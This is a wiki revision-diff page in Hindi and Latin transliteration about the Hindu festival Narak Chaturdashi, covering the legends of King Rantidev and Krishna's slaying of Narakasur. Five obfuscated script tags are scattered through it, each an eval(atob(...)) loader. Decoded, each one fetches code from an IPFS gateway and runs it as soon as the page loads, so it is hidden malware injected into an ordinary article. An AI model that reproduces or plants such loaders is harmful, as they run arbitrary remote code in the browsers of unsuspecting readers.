Difference between revisions of "नरक चतुर्दशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "पुरूष" to "पुरुष")
Line 24: Line 24:
 
इस चतुर्दशी से जुड़ी पौराणिक कथाएँ इस प्रकार हैं-
 
इस चतुर्दशी से जुड़ी पौराणिक कथाएँ इस प्रकार हैं-
 
;प्रथम कथानुसार-
 
;प्रथम कथानुसार-
एक कथा के अनुसार रन्तिदेव नामक एक राजा हुए थे। वह बहुत ही पुण्यात्मा और धर्मात्मा पुरूष थे। सदैव [[धर्म]], कर्म के कार्यों में लगे रहते थे। जब उनका अंतिम समय आया तो यमराज के दूत उन्हें लेने के लिए आये। वे दूत राजा को [[नरक]] में ले जाने के लिए आगे बढ़े। यमदूतों को देख कर राजा आश्चर्य चकित हो गये और उन्होंने पूछा- "मैंने तो कभी कोई अधर्म या पाप नहीं किया है तो फिर आप लोग मुझे नर्क में क्यों भेज रहे हैं। कृपा कर मुझे मेरा अपराध बताइये, कि किस कारण मुझे नरक का भागी होना पड़ रहा ह।". राजा की करूणा भरी वाणी सुनकर यमदूतों ने कहा- "हे राजन एक बार तुम्हारे द्वार से एक [[ब्राह्मण]] भूखा ही लौट गया था, जिस कारण तुम्हें नरक जाना पड़ रहा है।<br />
+
एक कथा के अनुसार रन्तिदेव नामक एक राजा हुए थे। वह बहुत ही पुण्यात्मा और धर्मात्मा पुरुष थे। सदैव [[धर्म]], कर्म के कार्यों में लगे रहते थे। जब उनका अंतिम समय आया तो यमराज के दूत उन्हें लेने के लिए आये। वे दूत राजा को [[नरक]] में ले जाने के लिए आगे बढ़े। यमदूतों को देख कर राजा आश्चर्य चकित हो गये और उन्होंने पूछा- "मैंने तो कभी कोई अधर्म या पाप नहीं किया है तो फिर आप लोग मुझे नर्क में क्यों भेज रहे हैं। कृपा कर मुझे मेरा अपराध बताइये, कि किस कारण मुझे नरक का भागी होना पड़ रहा ह।". राजा की करूणा भरी वाणी सुनकर यमदूतों ने कहा- "हे राजन एक बार तुम्हारे द्वार से एक [[ब्राह्मण]] भूखा ही लौट गया था, जिस कारण तुम्हें नरक जाना पड़ रहा है।<br />
 
राजा ने यमदूतों से विनती करते हुए कहा कि वह उसे एक वर्ष का और समय देने की कृपा करें। राजा का कथन सुनकर यमदूत विचार करने लगे और राजा को एक वर्ष की आयु प्रदान कर वे चले गये। यमदूतों के जाने के बाद राजा इस समस्या के निदान के लिए ऋषियों के पास गया और उन्हें समस्त वृत्तांत बताया। ऋषि राजा से कहते हैं कि यदि राजन [[कार्तिक माह]] की [[कृष्ण पक्ष]] की [[चतुर्दशी]] का व्रत करे और ब्राह्मणों को भोजन कराये और उनसे अपने अपराधों के लिए क्षमा याचना करे तो वह पाप से मुक्त हो सकता है। ऋषियों के कथन के अनुसार राजा कार्तिक माह की कृष्ण चतुर्दशी का व्रत करता है। इस प्रकार वह पाप से मुक्त होकर भगवान [[विष्णु]] के वैकुण्ठ धाम को पाता है।
 
राजा ने यमदूतों से विनती करते हुए कहा कि वह उसे एक वर्ष का और समय देने की कृपा करें। राजा का कथन सुनकर यमदूत विचार करने लगे और राजा को एक वर्ष की आयु प्रदान कर वे चले गये। यमदूतों के जाने के बाद राजा इस समस्या के निदान के लिए ऋषियों के पास गया और उन्हें समस्त वृत्तांत बताया। ऋषि राजा से कहते हैं कि यदि राजन [[कार्तिक माह]] की [[कृष्ण पक्ष]] की [[चतुर्दशी]] का व्रत करे और ब्राह्मणों को भोजन कराये और उनसे अपने अपराधों के लिए क्षमा याचना करे तो वह पाप से मुक्त हो सकता है। ऋषियों के कथन के अनुसार राजा कार्तिक माह की कृष्ण चतुर्दशी का व्रत करता है। इस प्रकार वह पाप से मुक्त होकर भगवान [[विष्णु]] के वैकुण्ठ धाम को पाता है।
 
;द्वितीय कथानुसार-
 
;द्वितीय कथानुसार-

Revision as of 07:34, 3 January 2016

narak chaturdashi
any nam chhoti dipavali, 'narak chaudas', 'roop chaudas', 'roop chaturdashi', 'nark chaturdashi', 'naraka pooja'
anuyayi hiandoo
uddeshy is chaturdashi ka poojan kar akal mrityu se mukti tatha svasthy suraksha ke lie yamaraj ji ki pooja v upasana ki jati hai.
prarambh pauranik kal
tithi kartik krishna paksh chaturdashi
dharmik manyata bhagavan shrikrishna ne kartik mah mean krishnapaksh ki chaturdashi ke din narakasur ka vadh karake devataoan v rrishiyoan ko usake atank se mukti dilavaee thi.
any janakari dipavali se ek din pahale manaee jane vali narak chaturdashi ke din sandhya ke pashchat dipak prajjavalit kie jate haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

narak chaturdashi kartik mah ke krishna paksh ki chaturdashi ko kaha jata hai. narak chaturdashi ko 'chhoti dipavali' bhi kahate haian. isake atirikt is chaturdashi ko 'narak chaudas', 'roop chaudas', 'roop chaturdashi', 'nark chaturdashi' ya 'naraka pooja' ke nam se bhi jana jata hai. hindoo manyataoan ke anusar yah mana jata hai ki kartik krishnapaksh chaturdashi ke din mrityu ke devata yamaraj ki pooja ka vidhan hai. dipavali se ek din pahale manaee jane vali narak chaturdashi ke din sandhya ke pashchat dipak prajjavalit kie jate haian. is chaturdashi ka poojan kar akal mrityu se mukti tatha svasthy suraksha ke lie yamaraj ji ki pooja v upasana ki jati hai.

pauranik kathaean

is chaturdashi se ju di pauranik kathaean is prakar haian-

pratham kathanusar-

ek katha ke anusar rantidev namak ek raja hue the. vah bahut hi punyatma aur dharmatma purush the. sadaiv dharm, karm ke karyoan mean lage rahate the. jab unaka aantim samay aya to yamaraj ke doot unhean lene ke lie aye. ve doot raja ko narak mean le jane ke lie age badhe. yamadootoan ko dekh kar raja ashchary chakit ho gaye aur unhoanne poochha- "maianne to kabhi koee adharm ya pap nahian kiya hai to phir ap log mujhe nark mean kyoan bhej rahe haian. kripa kar mujhe mera aparadh bataiye, ki kis karan mujhe narak ka bhagi hona p d raha h.". raja ki karoona bhari vani sunakar yamadootoan ne kaha- "he rajan ek bar tumhare dvar se ek brahman bhookha hi laut gaya tha, jis karan tumhean narak jana p d raha hai.
raja ne yamadootoan se vinati karate hue kaha ki vah use ek varsh ka aur samay dene ki kripa karean. raja ka kathan sunakar yamadoot vichar karane lage aur raja ko ek varsh ki ayu pradan kar ve chale gaye. yamadootoan ke jane ke bad raja is samasya ke nidan ke lie rrishiyoan ke pas gaya aur unhean samast vrittaant bataya. rrishi raja se kahate haian ki yadi rajan kartik mah ki krishna paksh ki chaturdashi ka vrat kare aur brahmanoan ko bhojan karaye aur unase apane aparadhoan ke lie kshama yachana kare to vah pap se mukt ho sakata hai. rrishiyoan ke kathan ke anusar raja kartik mah ki krishna chaturdashi ka vrat karata hai. is prakar vah pap se mukt hokar bhagavan vishnu ke vaikunth dham ko pata hai.

dvitiy kathanusar-

ek any prasanganusar bhagavan shrikrishna ne kartik mah mean krishna chaturdashi ke din narakasur ka vadh karake devataoan v rrishiyoan ko usake atank se mukti dilavaee thi. isake sath hi krishna bhagavan ne solah hazar kanyaoan ko narakasur ke bandigrih se mukt karavaya. isi upalakshy mean nagaravasiyoan ne nagar ko dipoan se prakashit kiya aur utsav manaya. tabhi se narak chaturdashi ka tyauhar manaya jane laga.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>